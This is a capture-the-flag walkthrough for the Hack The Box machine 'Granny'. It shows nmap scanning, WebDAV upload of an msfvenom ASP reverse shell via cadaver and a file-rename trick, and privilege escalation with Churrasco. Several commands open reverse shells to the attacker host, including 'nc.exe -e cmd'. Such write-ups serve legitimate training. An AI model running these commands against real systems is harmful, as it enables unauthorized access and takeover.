Granny

Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.15 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80 10.10.10.15 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
Exploitation
As we can see in the nmap scan, HTTP methods such as PUT or COPY can be used in the web server. We could try to use the cadaver tool, and see if we can upload malicious payload on the web server.
cadaver 10.10.10.15
dav:/> ls
We can see all the files in the directory. As we can see in this exploit, we could upload a malicious file with the .txt extension, and then rename it to .asp so we can execute it. First, let's create the malicious file with the .txt extension.
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.7 lport=4444 -f asp -o shell.txt
-pindicates the type of payload.lhostlocal host IP.lportlocal port of the listener.-foutput format.-osave the output to a file.
Now, let's upload it with the cadaver shell.
dav:/> put shell.txt
Now, we'll have to rename it so it has the .asp extension.
dav:/> copy shell.txt shell.asp;.txt
Before executing the file, let's set a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Finally, if we access the shell.asp file, we should get a reverse shell as the nt authority\network service user.
curl "http://10.10.10.15/shell.asp;.txt"
Privilege Escalation
Let's see what privileges the user nt authority\network service has.
whoami /priv
If a user has the SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.
To escalate privileges, we'll have to transfer JuicyPotato.exe to the victim machine. Let's set a SMB server with the impacket library, on the directory where we have the JuicyPotato binary.
impacket-smbserver sambaFolder $(pwd) -smb2support
And download the binaries from the \windows\temp folder.
copy \\10.10.14.7\sambaFolder\JuicyPotato.exe JuicyPotato.exe
If we execute it, we'll get an error saying that the binary is incompatible with the system architecture.
JuicyPotato.exe
But, no worries, there is an alternative to JuicyPotato. It is called Churrasco, and you can download it from here. Once you download it, transfer it to the Windows machine with the same method we did before. And if we execute it indicating the whoami command, we'll see that we can execute commands as the nt authority\system user.
churrasco.exe "whoami"
Let's get a shell as the nt authority\system user. First, let's set a netcat listener on port 5555.
rlwrap nc -lvnp 5555
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Then, let's set another SMB server on the directory where the nc.exe binary is.
impacket-smbserver sambaFolder $(pwd) -smb2support
And finally, execute the following command on the Windows machine, which will send a shell as the nt authority\system user to the netcat listener.
churrasco.exe "\\10.10.14.7\sambaFolder\nc.exe -e cmd 10.10.14.7 5555"
Finally, all we have to do is reap the harvest and take the user and the root flag.
Last updated
Was this helpful?